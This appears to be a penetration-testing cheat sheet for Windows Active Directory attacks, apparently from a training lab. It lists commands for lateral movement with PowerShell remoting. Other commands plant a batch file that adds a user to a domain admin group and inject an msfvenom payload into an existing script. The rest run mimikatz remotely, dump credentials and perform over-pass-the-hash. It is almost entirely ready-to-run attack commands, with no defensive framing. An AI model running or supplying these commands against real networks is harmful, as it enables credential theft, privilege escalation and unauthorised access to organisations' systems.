Using Find-LocalAdminAccess
we can find local admins on the machine and via Enter-PSSession
we can laterally move within the network
Enter-PSSession -Computername <servername>
Stateful command via Enter-PSSession
$sess = New-PSSession -Computername <servername>
Enter-PSSession -Session $sess
Stateful command via Invoke-Command
$sess = New-PSSession -Computername <servername>
Invoke-Command -Session $sess -ScriptBlock {$proc = Get-Process}
Invoke-Command -Session $sess -ScriptBlock {$proc.Name}
Write file via script block
Invoke-Command -ComputerName <servername> -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}
Read file via script block
Invoke-Command -computername <servername> -ConfigurationName dc_manage -ScriptBlock {((cat "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\msfvenom.exe') | set-content -path c:\users\akash\Desktop\wm.ps1} -credential $cred
Command execution using command and ScriptBlock
Invoke-Command -computername computer-name -ConfigurationName dc_manage -credential $cred -command {whoami}
Invoke-Command -computername computer-name -ConfigurationName dc_manage -credential $cred -ScriptBlock {whoami}
Invoke-Command -computername dcorp-adminsrv.dollarcorp.moneycorp.local -command {whoami}
Invoke-Command -computername dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {whoami}
File execution using ScriptBlock
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock{"C:\temp\mimikatz.exe"}
File execution using FilePath
Invoke-Command -computername dcorp-adminsrv.dollarcorp.moneycorp.local -FilePath "C:\temp\mimikatz.exe"
Mimikatz
Over Pass the hash is an attack that enables an adversary to pass a user account's NTLM hash into the Kerberos authentication provider
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntImhash> /run:powershell.exe"'